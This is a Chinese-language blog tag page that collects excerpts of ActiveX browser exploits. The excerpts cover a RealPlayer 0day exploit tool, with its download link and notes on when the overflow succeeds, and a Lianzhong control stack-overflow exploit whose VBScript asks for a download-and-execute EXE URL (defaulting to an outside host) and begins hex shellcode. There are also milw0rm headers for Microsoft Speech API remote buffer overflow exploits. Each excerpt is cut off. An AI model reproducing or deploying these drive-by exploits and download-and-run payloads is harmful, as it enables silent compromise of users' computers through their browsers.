标签 ‘Activex’ 下的日志
Realplay ActiveX 0day 利用工具
来源:酒水不犯茶水
好像10.5以下版本都中,这个似乎只能溢出一次,第一次溢出成功后,第二次开始会有realplay修复数据库的提示,点修复就中,取消不中
上次测试使用的"Windows 按钮突破专家" 4.5K 溢出没问题,但是"iecv.exe"那个87K
溢出的时候老是看不到界面,其实已经执行(进程中可以看到),不知道为什么(不知道是否大小问题)
另:IE5不中,代码中直接跳过了
http://www.blogjava.net/Files/baicker/realplay_071122_exp.rar
Tags: Activex, Exploit, RealPlayer联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞(exp)
鬼仔注:又见联众
来源:vbs空间
exeurl = InputBox( "请输入下载执行exe的地址:", "输入","http://np.icehack.com/np.exe" )
'code by NetPatch
if exeurl <> "" then
code="\xe9\xf3\x00\x00\x00\x90\x90\x90\x90\x5a\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x8b\xd8\x8b\x73\x3c\x8b\x74\x1e\x78\x03\xf3\x8 阅读全文 »
Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
来源:milw0rm
<!–
01/06/2007 23.19.50
Microsoft Windows DirectSpeechSynthesis Module (XVoice.dll)
/ DirectSpeechRecognition Module (Xlisten.dll)
remote buffer overflow exploit / 2k sp4 seh version
both the dlls are located in %SystemRoot%\speech folder
and they are vulnerable to the same issue.
while on 2k it depends on activex settings, under xp they are both
阅读全文 »
Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
来源:milw0rm
6.30 10/06/2007
Microsoft Windows DirectSpeechSynthesis Module (XVoice.dll 4.0.4.2512)
/ DirectSpeechRecognition Module (Xlisten.dll 4.0.4.2512)
remote buffer overflow exploit/ xp sp2 version
both dlls are vulnerable, this is the poc for the first one
worked regardless of boot.ini settings, remotely and
by dragging the html file in the browser window
阅读全文 »